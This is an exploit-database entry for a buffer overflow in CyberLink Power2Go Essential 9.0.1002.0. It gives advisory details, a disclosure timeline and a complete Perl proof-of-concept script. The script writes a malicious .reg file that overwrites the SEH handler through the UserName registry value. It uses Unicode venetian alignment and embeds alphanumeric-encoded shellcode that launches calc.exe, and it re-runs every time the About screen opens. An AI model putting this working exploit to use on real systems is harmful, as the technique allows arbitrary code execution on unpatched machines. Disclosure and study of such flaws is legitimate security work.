CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow

vendor:

Power2Go Essential

by:

Mike Czumak

N/A

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Power2Go Essential

Affected Version From: 9.0.1002.0

Affected Version To: 9.0.1002.0

Patch Exists: YES

Related CWE:

CPE: cyberlink:power2go:9.0.1002.0

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3

2013

CyberLink Power2Go Essential 9.0.1002.0 – Registry SEH/Unicode Buffer Overflow

Power2Go uses registry keys to set various attributes including the registered username. The registered username is loaded into memory for display when the "About" screen is opened. These registry values can be found here: HKEY_LOCAL_MACHINESOFTWARECyberLinkPower2Go99.0. It loads these values into memory without proper bounds checks which enables the exploit. To exploit, run created .reg file, open Power2Go, and click on Power2Go Logo in the upper left corner. Once the registry has been modified, this exploit will be persistent and execute every time the application is run and the "About" screen is opened.

Mitigation:

Apply the patch provided by the vendor.

Source

Exploit-DB raw data:

#!/usr/bin/perl

######################################################################################################
# Exploit Title: CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow
# Discovery date: 11-26-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software/Version: CyberLink Power2Go 9 Essential 9.0.1002.0
# Vendor Site: http://www.cyberlink.com/
# Tested On: Windows XP SP3
# Timeline:
# -- 11/28/13: Initial contact to vendor requesting appropriate POC to provide vuln details  
# -- 12/03/13: Received appropriate submission POC, initial vuln details provided to vendor
# -- 12/11/13: Vendor response indicating issue has been escalated to Development team
# -- 12/17/13: Vendor response indicating RD team working on fix
# -- 03/05/14: Requested status from vendor who indicated issue has been re-escalated to Development
# -- 03/07/13: Vendor response indicating someone from Development would contact for more details
# -- 03/07/14: Vendor response indicating product team working on fix, new release scheduled 3/28
# -- 03/16/14: Additional details provided to vendor as requested
# -- 04/06/14: Status update requested from vendor
# -- 04/08/14: New build released, provided for testing; confirmed fix for this issue
# Details:
# -- Power2Go uses registry keys to set various attributes including the registered username
# -- The registered username is loaded into memory for display when the "About" screen is opened
# -- These registry values can be found here: HKEY_LOCAL_MACHINE\SOFTWARE\CyberLink\Power2Go9\9.0
# -- It loads these values into memory without proper bounds checks which enables the exploit
# To Exploit:
# -- 1) Run created .reg file 2) Open Power2Go 3) Click on Power2Go Logo in the upper left corner 
# -- Once the registry has been modified, this exploit will be persistent and execute every time
# -- the application is run and the "About" screen is opened 
######################################################################################################

my $buffsize = 50000; # sets buffer size for consistent sized payload

# construct the required start and end of the reg file
my $regfilestart ="Windows Registry Editor Version 5.00\n\n";
$regfilestart = $regfilestart . "[HKEY_LOCAL_MACHINE\\SOFTWARE\\CyberLink\\Power2Go9\\9.0]\n";
$regfilestart = $regfilestart . "\"UserName\"="; # The UserName field is vulnerable

my $junk = "T_v3rn1x" . ("\x41" x 4892); # offset to next seh 
my $nseh = "\x61\x62"; # overwrite next seh with popad + nop
my $seh = "\xd0\x50"; # overwrite seh with unicode friendly pop pop ret

# unicode venetian alignment
my $venalign = "\x6e";
$venalign = $venalign . "\x53"; # push ebx; ebx is the register closest to our shellcode following the popad 
$venalign = $venalign . "\x6e"; # venetian pad/align
$venalign = $venalign . "\x58"; # pop eax; put ebx into eax and modify to jump to our shellcode (200 bytes)
$venalign = $venalign . "\x6e"; # venetian pad/align
$venalign = $venalign . "\x05\x14\x11"; # add eax,0x11001400
$venalign = $venalign . "\x6e"; # venetian pad/align 
$venalign = $venalign . "\x2d\x12\x11"; # sub eax,0x11001200
$venalign = $venalign . "\x6e"; # venetian pad/align
$venalign = $venalign . "\x50"; # push eax
$venalign = $venalign . "\x6e"; # venetian pad/align
$venalign = $venalign . "\xc3"; # ret

my $nops = "\x71" x 236; # some unicode friendly filler before the shellcode

# Calc.exe payload
# msfpayload windows/exec CMD=calc.exe R
# alpha2 unicode/uppercase
my $shell = "PPYAIAIAIAIAQATAXAZAPA3QADAZA".
"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA".
"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB".
"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K".
"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL".
"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55".
"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V".
"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB".
"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT".
"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU".
"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM".
"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC".
"QQ2LRCM0LJA";

my $sploit = $junk.$nseh.$seh.$venalign.$nops.$shell; # assemble the exploit portion of the buffer
my $fill = "\x71" x ($buffsize - length($sploit)); # fill remainder of buffer with junk
my $buffer = $sploit.$fill; # assemble the final buffer

my $regfile = $regfilestart . "hex: " . $buffer . $regfileend; # construct the reg file with hex payload to generate binary registry entry
my $regfile = $regfilestart . "\"". $buffer . "\"";

# write the exploit buffer to file
my $file = "cyberlinkp2g9_bof.reg";
open(FILE, ">$file");
print FILE $regfile;
close(FILE);
print "Exploit file [" . $file . "] created\n";
print "Buffer size: " . length($buffer) . "\n";